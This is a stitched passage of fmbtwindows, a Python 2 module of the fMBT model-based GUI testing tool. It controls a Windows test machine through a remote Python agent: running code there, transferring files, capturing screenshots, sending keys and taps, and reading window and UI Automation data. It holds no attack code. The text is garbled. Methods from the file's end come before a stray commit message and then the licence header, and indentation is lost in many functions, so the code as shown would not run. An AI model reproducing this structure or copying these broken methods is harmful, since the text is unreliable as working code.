        if not self._pycosh_sent_to_dut:
            # upload pycosh module to DUT
            self.execPython(file(inspect.getsourcefile(pycosh)).read())
            self._pycosh_sent_to_dut = True
        return self.evalPython("pycosh_eval(%s)" % (repr(command),))
    def setScreenshotSize(self, screenshotSize):
        """Force screenshot resolution and rescale input coordinates.

        Maps between screenshot coordinates and the mouse input area
        reported by the agent.
        """
        self._screenshotSize = screenshotSize
        screenW, screenH = self._screenshotSize
        inputW, inputH = self._agent.eval_in(self._agent_ns, "_mouse_input_area")
        # NOTE(review): Python 2 integer division in the lambdas below --
        # presumably intended for pixel coordinates; confirm when porting.
        self.setScreenToDisplayCoords(
            lambda x, y: (x * inputW / screenW, y * inputH / screenH))
        self.setDisplayToScreenCoords(
            lambda x, y: (x * screenW / inputW, y * screenH / inputH))
    def execPython(self, code):
        """Execute code in the agent's namespace."""
        return self._agent.exec_in(self._agent_ns, code)
    def evalPython(self, code):
        """Evaluate an expression in the agent's namespace, return its value."""
        return self._agent.eval_in(self._agent_ns, code)
def recvFile(self, remoteFilename, localFilename=None, compress=False):
if compress:
if isinstance(compress, int):
compressLevel = compress
else:
compressLevel = 3
data = self._agent.eval_in(
self._agent_ns,
"zlib.compress(file(%s, 'rb').read(), %s)" % (
repr(remoteFilename), compressLevel))
data = zlib.decompress(data)
else:
data = self._agent.eval_in(
self._agent_ns,
"file(%s, 'rb').read()" % (repr(remoteFilename),))
if localFilename:
file(localFilename, "wb").write(data)
return True
else:
return data
def sendFile(self, localFilename, remoteFilepath):
data = file(localFilename).read()
rv = self.evalPython('saveFile(%s, %s, base64.b64decode(%s))' %
(repr(os.path.basename(localFilename)),
repr(remoteFilepath),
repr(base64.b64encode(data))))
return rv
def recvMatchingPaths(self, pathnamePattern):
return self._agent.eval_in(self._agent_ns,
"glob.glob(%s)" % (repr(pathnamePattern),))
    def recvScreenshot(self, filename, screenshotSize=(None, None)):
        """Fetch a screenshot from the device and write it to filename.

        Writes PNG directly if fmbtpng is available, otherwise writes a
        temporary PPM and converts it with ImageMagick. Returns True.
        """
        ppmfilename = filename + ".ppm"
        if screenshotSize == (None, None):
            screenshotSize = self._screenshotSize
        # The agent returns dimensions plus zlib-compressed BGR pixel data.
        width, height, zdata = self._agent.eval_in(
            self._agent_ns, "screenshotZYBGR(%s)" % (repr(screenshotSize),))
        data = zlib.decompress(zdata)
        # In-place BGR -> RGB conversion via the eye4graphics C helper.
        fmbtgti.eye4graphics.wbgr2rgb(data, width, height)
        if fmbtpng != None:
            file(filename, "wb").write(
                fmbtpng.raw2png(data, width, height, 8, "RGB"))
        else:
            # No fmbtpng: write raw pixels as PPM (P6), then convert to the
            # requested file format with ImageMagick and drop the PPM.
            ppm_header = "P6\n%d %d\n%d\n" % (width, height, 255)
            f = file(filename + ".ppm", "wb")
            f.write(ppm_header)
            f.write(data)
            f.close()
            _run([fmbt_config.imagemagick_convert, ppmfilename, filename], expectedExitStatus=[0])
            os.remove(ppmfilename)
        return True
    def recvTopWindowProperties(self):
        """Return properties of the foreground window as a dictionary."""
        return self.evalPython("topWindowProperties()")
def recvWindowProperties(self, window):
hwnd = self._window2hwnd(window)
return self.evalPython("windowProperties(%s)" % (hwnd,))
def recvWindowStatus(self, window):
hwnd = self._window2hwnd(window)
return self.evalPython("windowStatus(%s)" % (hwnd,))
def recvViewData(self, window=None):
    """Fetch widget data via the agent's EnumChildWindows backend.

    window may be None (top window), an integer hWnd, or a window
    title string. Raises ValueError on unknown title or illegal type.
    """
    rv = None
    if window == None:
        rv = self.evalPython("topWindowWidgets()")
    elif isinstance(window, int):
        rv = self.evalPython("windowWidgets(%s)" % (repr(window),))
    elif isinstance(window, str) or isinstance(window, unicode):
        # resolve the title to a window handle
        wlist = self.evalPython("windowList()")
        for w in wlist:
            if w["title"] == window:
                rv = self.evalPython("windowWidgets(%s)" % (repr(w["hwnd"]),))
                break
        else:
            # for/else: no window with a matching title was found
            raise ValueError('no window with title "%s"' % (window,))
    else:
        raise ValueError('illegal window "%s", expected integer or string (hWnd or title)' % (window,))
    return rv
def recvViewUIAutomation(self, window=None, items=[], properties=None, area=None, walker="raw"):
    """returns list of dictionaries, each of which contains properties of
    an item

    window: None (all), title string or hWnd; items: restrict the dump
    to the branches of these ViewItems; properties: property names to
    read; area: (left, top, right, bottom) filter; walker: UIAutomation
    TreeWalker variant ("raw", "control" or "content").
    """
    # NOTE(review): items=[] is a mutable default argument; it is only
    # read here, never mutated, so it is harmless in practice.
    if not walker in ["raw", "control", "content"]:
        raise ValueError('invalid walker %s' % (repr(walker),))
    if window != None:
        hwnd = self._window2hwnd(window)
    else:
        hwnd = None
    if properties == None:
        properties = []
    else:
        # make sure certain properties are always included
        propertySet = set(properties)
        for must_be in ["BoundingRectangle"]:
            propertySet.add(must_be)
        properties = list(propertySet)
    dumps = []
    if items:
        # one dump per requested item branch
        for item in items:
            # NOTE(review): the inner list comprehension reuses the
            # name "item" (which leaks in Python 2); harmless because
            # the outer loop rebinds it on the next iteration.
            dumps.append(self.evalPython("dumpUIAutomationElements(%s, %s, %s, %s, %s)" % (
                repr(hwnd),
                repr([str(item.id()) for item in item.branch()]),
                repr(properties),
                repr(area),
                repr(walker))))
    else:
        dumps.append(self.evalPython("dumpUIAutomationElements(%s, %s, %s, %s, %s)" % (
            repr(hwnd),
            repr([]),
            repr(properties),
            repr(area),
            repr(walker))))
    # Parse "name=value" lines; a "hash" line starts a new element.
    rv = []
    prop_data = {}
    for dump in dumps:
        for prop_line in dump.splitlines():
            if not "=" in prop_line:
                continue
            prop_name, prop_value = prop_line.split("=", 1)
            if prop_name == "hash":
                # flush the previous element before starting a new one
                if prop_data:
                    rv.append(prop_data)
                prop_data = {}
            # unescape newlines and backslashes encoded by the agent
            prop_data[prop_name] = prop_value.replace(r"\r\n", "\n").replace(r"\\", "\\")
    # flush the last element
    if prop_data:
        rv.append(prop_data)
    return rv
def recvWindowList(self):
    """Return the list of windows known to the agent."""
    command = "windowList()"
    return self.evalPython(command)
def _window2hwnd(self, window):
    """Resolve a window reference (title, hwnd or property dict) to a handle."""
    if isinstance(window, str) or isinstance(window, unicode):
        # title: look it up from the current window list
        matches = [w["hwnd"] for w in self.recvWindowList()
                   if w["title"] == window]
        if not matches:
            raise ValueError('no window with title "%s"' % (window,))
        return matches[0]
    if isinstance(window, dict) and "hwnd" in window:
        return window["hwnd"]
    if isinstance(window, int) or isinstance(window, long):
        return window
    raise ValueError('invalid window "%s", string, integer or dict with "hwnd" key expected' % (window,))
def sendCloseWindow(self, window):
    """Ask the agent to close the given window (title or handle)."""
    hwnd = self._window2hwnd(window)
    command = "closeWindow(%s)" % (repr(hwnd),)
    return self.evalPython(command)
def sendSetForegroundWindow(self, window):
    """Bring window to the foreground; True if the user32 call succeeded."""
    hwnd = self._window2hwnd(window)
    result = self.evalPython(
        "ctypes.windll.user32.SetForegroundWindow(%s)" % (repr(hwnd),))
    return result != 0
def sendSetTopWindow(self, window):
    """Make window the top window; True if the agent call succeeded."""
    hwnd = self._window2hwnd(window)
    result = self.evalPython("setTopWindow(%s)" % (repr(hwnd),))
    return result != 0
def sendShowWindow(self, window, showCmd):
    """Call ShowWindow on window with showCmd (one of the SW_* constants)."""
    hwnd = self._window2hwnd(window)
    command = "showWindow(%s, %s)" % (repr(hwnd), repr(showCmd))
    return self.evalPython(command)
def sendType(self, text):
    """Type text on the device; always returns True."""
    command = 'sendType(%s)' % (repr(text),)
    agent = self._agent
    agent.eval_in(self._agent_ns, command)
    return True
def sendPress(self, keyCode, modifiers=None):
    """Press and release keyCode, optionally holding modifier keys."""
    modList = "[]" if modifiers is None else repr(modifiers)
    command = 'sendKey("%s",%s)' % (keyCode, modList)
    self._agent.eval_in(self._agent_ns, command)
    return True
def sendKeyDown(self, keyCode, modifiers=None):
    """Press (hold down) keyCode, optionally with modifier keys."""
    modList = "[]" if modifiers is None else repr(modifiers)
    command = 'sendKeyDown("%s",%s)' % (keyCode, modList)
    self._agent.eval_in(self._agent_ns, command)
    return True
def sendKeyUp(self, keyCode, modifiers=None):
    """Release keyCode, optionally together with modifier keys."""
    modList = "[]" if modifiers is None else repr(modifiers)
    command = 'sendKeyUp("%s",%s)' % (keyCode, modList)
    self._agent.eval_in(self._agent_ns, command)
    return True
def sendTap(self, x, y, button=None):
    """Tap at screenshot coordinates; with button, send a mouse click instead."""
    dispX, dispY = self._screenToDisplay(x, y)
    if button is None:
        command = "sendTap(%s, %s)" % (dispX, dispY)
    else:
        command = "sendClick(%s, %s, %s)" % (dispX, dispY, button)
    self._agent.eval_in(self._agent_ns, command)
    return True
def sendTouchDown(self, x, y, button=None):
    """Touch down at (x, y); with button, press that mouse button instead."""
    dispX, dispY = self._screenToDisplay(x, y)
    if button is None:
        command = "sendTouchDown(%s, %s)" % (dispX, dispY)
    else:
        command = "(sendMouseMove(%s, %s), sendMouseDown(%s))" % (dispX, dispY, button)
    self._agent.eval_in(self._agent_ns, command)
    return True
def sendTouchMove(self, x, y, button=None):
    """Move an ongoing touch (or pressed mouse button) to (x, y)."""
    dispX, dispY = self._screenToDisplay(x, y)
    if button is None:
        command = "sendTouchMove(%s, %s)" % (dispX, dispY)
    else:
        command = "sendMouseMove(%s, %s, %s)" % (dispX, dispY, button)
    self._agent.eval_in(self._agent_ns, command)
    return True
def sendTouchUp(self, x, y, button=None):
    """Lift the touch (or release the mouse button) at (x, y)."""
    dispX, dispY = self._screenToDisplay(x, y)
    if button is None:
        command = "sendTouchUp(%s, %s)" % (dispX, dispY)
    else:
        command = "(sendMouseMove(%s, %s, %s), sendMouseUp(%s))" % (
            dispX, dispY, button, button)
    self._agent.eval_in(self._agent_ns, command)
    return True
def sendPinch(self, *args):
    """Forward pinch gesture parameters verbatim to the agent's touchPinch."""
    command = "touchPinch%s" % (args,)
    self.evalPython(command)
    return True
def setScreenToDisplayCoords(self, screenToDisplayFunction):
    """Install the function that maps screenshot coordinates to display coordinates."""
    self._screenToDisplay = screenToDisplayFunction
def setDisplayToScreenCoords(self, displayToScreenFunction):
    """Install the function that maps display coordinates back to screenshot coordinates."""
    self._displayToScreen = displayToScreenFunction
class FMBTWindowsError(Exception): pass
fmbtwindows: added data parameter to Device.putFile
Enables creating a new file on the device under test.
# fMBT, free Model Based Testing tool
# Copyright (c) 2014, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
"""
This library implements fMBT GUITestInterface for Windows
How to setup Windows device under test
1. Install Python 2.X. (For example 2.7.)
2. Add Python to PATH, so that command "python" starts the interpreter.
3. Copy fMBT's pythonshare directory to Windows.
4. In the pythonshare directory, run "python setup.py install"
5. Run:
cd \\python27\\scripts
python pythonshare-server --interface=all --password=xxxxxxxx
How to connect to the device
import fmbtwindows
d = fmbtwindows.Device("IP-ADDRESS-OF-THE-DEVICE", password="xxxxxxxx")
"""
import ast
import base64
import fmbt
import fmbt_config
import fmbtgti
import inspect
import math
import os
import pythonshare
import shutil
import subprocess
import time
import zlib
try:
import pycosh
except ImportError:
pycosh = None
try:
import fmbtpng
except ImportError:
fmbtpng = None
# subprocess close_fds default: on native Windows, Python 2's
# subprocess.Popen cannot combine close_fds=True with redirected
# stdout/stderr, so keep descriptors inheritable there.
if os.name == "nt":
    _g_closeFds = False
else:
    _g_closeFds = True
def _adapterLog(msg):
    """Write msg to the fMBT adapter log, tagged with this module's name."""
    fmbt.adapterlog("fmbtwindows %s" % (msg,))
def _run(command, expectedExitStatus=None):
    """
    Execute command in child process, return status, stdout, stderr.

    If expectedExitStatus is given, wait for the process and raise
    FMBTWindowsError unless the exit status matches; otherwise the
    process is started fire-and-forget and out/err are ('', None).
    """
    # a plain string command is run through the shell
    if type(command) == str:
        shell = True
    else:
        shell = False
    try:
        p = subprocess.Popen(command, shell=shell,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE,
                             close_fds=_g_closeFds)
        if expectedExitStatus != None:
            out, err = p.communicate()
        else:
            # no status expected: do not wait for the process
            out, err = ('', None)
    except Exception, e:
        # Popen itself failed: synthesize a process-like object with
        # shell-style "command not found" exit status
        class fakeProcess(object): pass
        p = fakeProcess
        p.returncode = 127
        out, err = ('', e)
    exitStatus = p.returncode
    # NOTE(review): the "not in" test assumes expectedExitStatus is a
    # sequence (callers pass e.g. [0]); a scalar int would raise
    # TypeError here -- confirm all callers pass lists.
    if (expectedExitStatus != None and
            exitStatus != expectedExitStatus and
            exitStatus not in expectedExitStatus):
        msg = "Executing %s failed. Exit status: %s, expected %s" % (
            command, exitStatus, expectedExitStatus)
        _adapterLog("%s\n stdout: %s\n stderr: %s\n" % (msg, out, err))
        raise FMBTWindowsError(msg)
    return exitStatus, out, err
# Virtual-key names accepted by pressKey()/sendPress(); the names are
# passed verbatim to the agent-side sendKey(). See MSDN "Virtual-Key
# Codes" for their meanings.
_g_keyNames = [
    "VK_LBUTTON", "VK_RBUTTON", "VK_CANCEL", "VK_MBUTTON",
    "VK_XBUTTON1", "VK_XBUTTON2", "VK_BACK", "VK_TAB", "VK_CLEAR",
    "VK_RETURN", "VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_PAUSE",
    "VK_CAPITAL", "VK_KANA", "VK_HANGUL", "VK_JUNJA", "VK_FINAL",
    "VK_HANJA", "VK_KANJI", "VK_ESCAPE", "VK_CONVERT", "VK_NONCONVERT",
    "VK_ACCEPT", "VK_MODECHANGE", "VK_SPACE", "VK_PRIOR", "VK_NEXT",
    "VK_END", "VK_HOME", "VK_LEFT", "VK_UP", "VK_RIGHT", "VK_DOWN",
    "VK_SELECT", "VK_PRINT", "VK_EXECUTE", "VK_SNAPSHOT", "VK_INSERT",
    "VK_DELETE", "VK_HELP", "VK_LWIN", "VK_RWIN", "VK_APPS", "VK_SLEEP",
    "VK_NUMPAD0", "VK_NUMPAD1", "VK_NUMPAD2", "VK_NUMPAD3", "VK_NUMPAD4",
    "VK_NUMPAD5", "VK_NUMPAD6", "VK_NUMPAD7", "VK_NUMPAD8", "VK_NUMPAD9",
    "VK_MULTIPLY", "VK_ADD", "VK_SEPARATOR", "VK_SUBTRACT", "VK_DECIMAL",
    "VK_DIVIDE", "VK_F1", "VK_F2", "VK_F3", "VK_F4", "VK_F5", "VK_F6",
    "VK_F7", "VK_F8", "VK_F9", "VK_F10", "VK_F11", "VK_F12", "VK_F13",
    "VK_F14", "VK_F15", "VK_F16", "VK_F17", "VK_F18", "VK_F19", "VK_F20",
    "VK_F21", "VK_F22", "VK_F23", "VK_F24", "VK_NUMLOCK", "VK_SCROLL",
    "VK_LSHIFT", "VK_RSHIFT", "VK_LCONTROL", "VK_RCONTROL", "VK_LMENU",
    "VK_RMENU", "VK_BROWSER_BACK", "VK_BROWSER_FORWARD",
    "VK_BROWSER_REFRESH", "VK_BROWSER_STOP", "VK_BROWSER_SEARCH",
    "VK_BROWSER_FAVORITES", "VK_BROWSER_HOME", "VK_VOLUME_MUTE",
    "VK_VOLUME_DOWN", "VK_VOLUME_UP", "VK_MEDIA_NEXT_TRACK",
    "VK_MEDIA_PREV_TRACK", "VK_MEDIA_STOP", "VK_MEDIA_PLAY_PAUSE",
    "VK_LAUNCH_MAIL", "VK_LAUNCH_MEDIA_SELECT", "VK_LAUNCH_APP1",
    "VK_LAUNCH_APP2", "VK_OEM_1", "VK_OEM_PLUS", "VK_OEM_COMMA",
    "VK_OEM_MINUS", "VK_OEM_PERIOD", "VK_OEM_2", "VK_OEM_3", "VK_OEM_4",
    "VK_OEM_5", "VK_OEM_6", "VK_OEM_7", "VK_OEM_8", "VK_OEM_102",
    "VK_PROCESSKEY", "VK_PACKET", "VK_ATTN", "VK_CRSEL", "VK_EXSEL",
    "VK_EREOF", "VK_PLAY", "VK_ZOOM", "VK_PA1", "VK_OEM_CLEAR", "0", "1",
    "2", "3", "4", "5", "6", "7", "8", "9", "A", "B", "C", "D", "E", "F",
    "G", "H", "I", "J", "K", "L", "M", "N", "O", "P", "Q", "R", "S", "T",
    "U", "V", "W", "X", "Y", "Z"]

# View sources supported by refreshView()/setViewSource().
_g_viewSources = ["enumchildwindows", "uiautomation",
                  "uiautomation/raw", "uiautomation/control",
                  "uiautomation/content"]

# ShowWindow showCmd
# Constants for showWindow()/sendShowWindow(); the values follow the
# Win32 ShowWindow() API.
SW_HIDE = 0
SW_NORMAL = 1
SW_MINIMIZED = 2
SW_MAXIMIZE = 3
SW_NOACTIVATE = 4
SW_SHOW = 5
SW_MINIMIZE = 6
SW_MINNOACTIVE = 7
SW_SHOWNA = 8
SW_RESTORE = 9
SW_DEFAULT = 10
SW_FORCEMINIMIZE = 11

# Re-export fmbtgti.sortItems at module level for convenience.
sortItems = fmbtgti.sortItems
class ViewItem(fmbtgti.GUIItem):
    """A single widget in a View, wrapping fmbtgti.GUIItem with the
    item's id, parent id, class name, text and raw properties."""

    def __init__(self, view, itemId, parentId, className, text, bbox, dumpFilename,
                 rawProperties=None):
        self._view = view
        self._itemId = itemId
        self._parentId = parentId
        self._className = className
        self._text = text
        self._properties = rawProperties if rawProperties else {}
        fmbtgti.GUIItem.__init__(self, self._className, bbox, dumpFilename)

    def branch(self):
        """Returns list of view items from the root down to this item

        Note: works only for UIAutomation backend"""
        if not self._view._viewSource.startswith("uiautomation"):
            raise NotImplementedError(
                "branch() works only for uiautomation at the moment")
        allItems = self._view._viewItems
        chain = []
        nodeId = self._itemId
        while nodeId:
            chain.append(allItems[nodeId])
            nodeId = allItems[nodeId]._parentId if nodeId in allItems else None
        chain.reverse()
        return chain

    def children(self):
        """Returns the direct child items of this item."""
        if self._view._viewSource.startswith("enumchildwindows"):
            tree = self._view._itemTree
            return [self._view._viewItems[winfo[0]]
                    for winfo in tree[self._itemId]]
        allItems = self._view._viewItems
        return [allItems[itemHash]
                for itemHash in allItems
                if allItems[itemHash]._parentId == self._itemId]

    def parent(self):
        """Returns the id of this item's parent."""
        return self._parentId

    def parentItem(self):
        """Returns the parent ViewItem, or None if it is unknown."""
        return self._view._viewItems.get(self._parentId)

    def id(self):
        """Returns the id of this item."""
        return self._itemId

    def properties(self):
        """Returns the raw property dictionary of this item."""
        return self._properties

    def text(self):
        """Returns the text (Value or Name) of this item."""
        return self._text

    def dumpProperties(self):
        """Returns "name=value" lines for all properties, sorted by name."""
        props = self._properties
        return "\n".join("%s=%s" % (key, props[key])
                         for key in sorted(props.keys()))

    def __str__(self):
        return "ViewItem(%s)" % (self._view._dumpItem(self),)
class View(object):
    """Widget hierarchy parsed from device view data.

    itemTree is either a dict (from the enumchildwindows backend) or a
    list of per-item property dictionaries (from uiautomation).
    """
    def __init__(self, dumpFilename, itemTree, itemOnScreen=None):
        self._dumpFilename = dumpFilename
        self._itemTree = itemTree
        self._rootItem = None
        self._viewItems = {}
        if itemOnScreen == None:
            # default: treat every item as on-screen
            self._itemOnScreen = lambda item: True
        else:
            self._itemOnScreen = itemOnScreen
        if isinstance(itemTree, dict):
            # data from enumchildwindows:
            self._viewSource = "enumchildwindows"
            for itemId, winfoList in itemTree.iteritems():
                for winfo in winfoList:
                    itemId, parentId, className, text, bbox = winfo
                    self._viewItems[itemId] = ViewItem(
                        self, itemId, parentId, className, text, bbox, dumpFilename)
            self._rootItem = self._viewItems[self._itemTree["root"][0][0]]
        elif isinstance(itemTree, list):
            # data from uiautomation:
            # list of dictionaries, each of which contains properties of an item
            self._viewSource = "uiautomation"
            for elt in itemTree:
                bboxString = elt.get("BoundingRectangle", "0;0;0;0")
                # the coordinate separator varies (locale-dependent)
                if ";" in bboxString:
                    bboxSeparator = ";"
                else:
                    bboxSeparator = ","
                try:
                    bbox = [int(coord) for coord in bboxString.split(bboxSeparator)]
                    bbox[2] = bbox[0] + bbox[2] # width to right
                    bbox[3] = bbox[1] + bbox[3] # height to bottom
                    bbox = tuple(bbox)
                except Exception:
                    # unparseable rectangle => empty bbox
                    bbox = (0, 0, 0, 0)
                text = elt.get("Value", "")
                if text == "":
                    text = elt.get("Name", "")
                vi = ViewItem(
                    self, int(elt["hash"]), int(elt["parent"]),
                    elt.get("ClassName", ""),
                    text,
                    bbox,
                    dumpFilename,
                    elt)
                self._viewItems[int(elt["hash"])] = vi
                if vi.parent() == 0:
                    self._rootItem = vi
        if not self._rootItem:
            raise ValueError("no root item in view data")

    def _intCoords(self, *args):
        # TODO: relative coordinates like (0.5, 0.9)
        return [int(c) for c in args[0]]

    def filename(self):
        return self._dumpFilename

    def rootItem(self):
        return self._rootItem

    def _dumpItem(self, viewItem):
        return "id=%s cls=%s text=%s bbox=%s" % (
            viewItem._itemId, repr(viewItem._className), repr(viewItem._text),
            viewItem._bbox)

    def _dumpTree(self, rootItem, depth=0):
        l = ["%s%s" % (" " * (depth * 4), self._dumpItem(rootItem))]
        for child in rootItem.children():
            l.extend(self._dumpTree(child, depth+1))
        return l

    def dumpTree(self, rootItem=None):
        """
        Returns item tree as a string
        """
        if rootItem == None:
            rootItem = self.rootItem()
        return "\n".join(self._dumpTree(rootItem))

    def __str__(self):
        return "View(%s, %s items)" % (repr(self._dumpFilename), len(self._viewItems))

    def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
        """Returns up to count items for which comparator(item) is True."""
        foundItems = []
        if count == 0: return foundItems
        if searchRootItem != None:
            # depth-first search starting from searchRootItem
            if comparator(searchRootItem) and (
                    not onScreen or (self._itemOnScreen(searchRootItem))):
                foundItems.append(searchRootItem)
            for c in searchRootItem.children():
                foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c, onScreen=onScreen))
        else:
            if searchItems:
                # Fix: domain was assigned iter(searchItems) and then
                # called below; an iterator is not callable and raised
                # TypeError. Wrap the sequence in a callable instead.
                domain = lambda: searchItems
            else:
                domain = self._viewItems.itervalues
            for i in domain():
                if comparator(i) and (not onScreen or (self._itemOnScreen(i))):
                    foundItems.append(i)
                    if count > 0 and len(foundItems) >= count:
                        break
        return foundItems

    def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
        """Returns items whose text equals (or contains, if partial) text."""
        if partial:
            c = lambda item: (text in item._text)
        else:
            c = lambda item: (text == item._text)
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)

    def findItemsByClass(self, className, partial=False, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
        """Returns items whose class name equals (or contains) className."""
        if partial:
            c = lambda item: (className in item._className)
        else:
            c = lambda item: (className == item._className)
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)

    def findItemsById(self, itemId, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
        """Returns items whose item id or AutomationId equals itemId."""
        c = lambda item: (itemId == item._itemId or itemId == item.properties().get("AutomationId", None))
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)

    def findItemsByProperties(self, properties, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
        """
        Returns ViewItems where every property matches given properties

        Parameters:

          properties (dictionary):
                  names and required values of properties

        Example:

          view.findItemsByProperties({"Value": "HELLO", "Name": "File name:"})

        See also:

          viewitem.dumpProperties()

        Notes:

          - requires uiautomation (refreshView(viewSource="uiautomation"))

          - all names and values are strings
        """
        c = lambda item: 0 == len([key for key in properties
                                   if properties[key] != item.properties().get(key, None)])
        return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)

    def findItemsByPos(self, pos, count=-1, searchRootItem=None, searchItems=None, onScreen=False):
        """
        Returns list of ViewItems whose bounding box contains the position.

        Parameters:

          pos (pair of floats (0.0..0.1) or integers (x, y)):
                  coordinates that fall in the bounding box of found items.

          other parameters: refer to findItems documentation.

        Items are listed in ascending order based on area. They may
        or may not be from the same branch in the widget hierarchy.
        """
        x, y = self._intCoords(pos)
        c = lambda item: (item.bbox()[0] <= x <= item.bbox()[2] and item.bbox()[1] <= y <= item.bbox()[3])
        items = self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems, onScreen=onScreen)
        # sort from smallest to greatest area
        area_items = [((i.bbox()[2] - i.bbox()[0]) * (i.bbox()[3] - i.bbox()[1]), i) for i in items]
        return [i for _, i in sorted(area_items)]

    def items(self):
        """
        Returns list of all items in the view
        """
        return fmbtgti.sortItems(self._viewItems.values(), "topleft")

    def save(self, fileOrDirName):
        """
        Save view dump to a file.
        """
        shutil.copy(self._dumpFilename, fileOrDirName)
class Device(fmbtgti.GUITestInterface):
def __init__(self, connspec=None, password=None, screenshotSize=(None, None),
             connect=True, **kwargs):
    """Connect to windows device under test.

    Parameters:

      connspec (string or None, optional):
              specification for connecting to a pythonshare
              server that will run fmbtwindows-agent. The format is
              "[socket://][password@]<host>[:<port>][/namespace]".
              The default is None: run the agent on host, do not
              connect to a pythonshare server (works only on Windows).

      password (string or None, optional):
              authenticate to pythonshare server with given
              password. The default is None (no authentication).

      rotateScreenshot (integer, optional)
              rotate new screenshots by rotateScreenshot degrees.
              Example: rotateScreenshot=-90. The default is 0 (no
              rotation).

      connect (boolean, optional):
              Immediately establish connection to the device. The
              default is True.

    To prepare a windows device for connection, launch there

    python pythonshare-server --password mysecretpwd

    When not on trusted network, consider ssh port forward, for
    instance.
    """
    # NOTE(review): the screenshotSize parameter is not used in this
    # constructor body -- confirm whether it should be stored.
    fmbtgti.GUITestInterface.__init__(self, **kwargs)
    self._defaultViewSource = _g_viewSources[1]  # "uiautomation"
    # NOTE(review): stores the constructor kwargs dict itself (not a
    # copy) as refreshView() defaults -- confirm intended aliasing.
    self._refreshViewDefaults = kwargs
    self._lastView = None       # most recent View, set by refreshView()
    self._lastViewStats = {}    # timing/retry stats of the last refresh
    self._refreshViewRetryLimit = 1
    self._connspec = connspec
    self._password = password
    if connect:
        self.setConnection(WindowsConnection(
            self._connspec, self._password))
    else:
        self.setConnection(None)
def closeWindow(self, window):
    """
    Send WM_CLOSE to window

    Parameters:

      window (window title (string) or handle (integer)):
              window to which the command will be sent.

    Returns True on success, otherwise False.
    """
    conn = self.existingConnection()
    return conn.sendCloseWindow(window)
def errorReporting(self):
    """
    Returns Windows error reporting (WER) settings in a dictionary

    See also: setErrorReporting(),
              MSDN WER Settings.
    """
    wer_key = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting"
    supported_settings = ["DisableArchive",
                          "Disabled",
                          "DisableQueue",
                          "DontShowUI",
                          "DontSendAdditionalData",
                          "LoggingDisabled",
                          "MaxArchiveCount",
                          "MaxQueueCount"]
    return dict((setting, self.getRegistry(wer_key, setting)[0])
                for setting in supported_settings)
def existingView(self):
    """Return the most recent view; raise FMBTWindowsError if no view exists."""
    if not self._lastView:
        raise FMBTWindowsError("view is not available. Missing refreshView()?")
    return self._lastView
def fileProperties(self, filepath):
    """
    Returns file properties as a dictionary.

    Parameters:

      filepath (string):
              full path to the file.
    """
    # Normalize to backslashes, then escape each backslash for the WMI
    # "where" clause evaluated on the device.
    # NOTE(review): '\\' -> r'\\\\' yields four backslashes per
    # separator; presumably required by wmic query quoting -- confirm.
    escapedFilename = filepath.replace('/', '\\').replace('\\', r'\\\\')
    return self.existingConnection().evalPython(
        '''wmicGet("datafile",'''
        '''componentArgs=("where", "name='%s'"))''' %
        escapedFilename)
def getFile(self, remoteFilename, localFilename=None, compress=False):
    """
    Fetch file from the device.

    Parameters:

      remoteFilename (string):
              file to be fetched on device

      localFilename (optional, string or None):
              file to be saved to local filesystem. If None,
              return contents of the file without saving them.

      compress (optional, boolean or integer):
              if True, file contents will be compressed for the transfer.
              Integer (0-9) defines compression level. The default is
              False: transfer without compression.
    """
    conn = self._conn
    return conn.recvFile(remoteFilename, localFilename, compress)
def getMatchingPaths(self, pathnamePattern):
    """
    Returns list of paths matching pathnamePattern on the device.

    Parameters:

      pathnamePattern (string):
              Pattern for matching files and directories on the device.

    Example:

      getMatchingPaths("c:/windows/*.ini")

    Implementation runs glob.glob(pathnamePattern) on remote device.
    """
    conn = self._conn
    return conn.recvMatchingPaths(pathnamePattern)
def getClipboard(self):
    """
    Returns clipboard contents in text format.

    See also: setClipboard()
    """
    conn = self.existingConnection()
    return conn.evalPython("getClipboardText()")
def itemOnScreen(self, guiItem, relation="touch", topWindowBbox=None):
    """
    Returns True if bbox of guiItem is non-empty and on the screen

    Parameters:

      relation (string, optional):
              One of the following:
              - "overlap": item intersects the screen and the window.
              - "touch": mid point (the default touch point) of the item
                is within the screen and the window.
              - "within": the screen and the window includes the item.
              The default is "touch".
    """
    # UIAutomation reports IsOffscreen as the string "True"/"False"
    if guiItem.properties().get("IsOffscreen", False) == "True":
        return False
    if relation == "touch":
        x1, y1, x2, y2 = guiItem.bbox()
        if x1 == x2 or y1 == y2:
            return False # a dimension is missing => empty item
        # use the default tap point (item midpoint) as a 1x1 box
        itemBox = (guiItem.coords()[0], guiItem.coords()[1],
                   guiItem.coords()[0] + 1, guiItem.coords()[1] + 1)
        partial = True
    elif relation == "overlap":
        itemBox = guiItem.bbox()
        partial = True
    elif relation == "within":
        itemBox = guiItem.bbox()
        partial = False
    else:
        raise ValueError('invalid itemOnScreen relation: "%s"' % (relation,))
    maxX, maxY = self.screenSize()
    if topWindowBbox == None:
        try:
            topWindowBbox = self.topWindowProperties()['bbox']
        except TypeError:
            # topWindowProperties() returned None: fall back to full screen
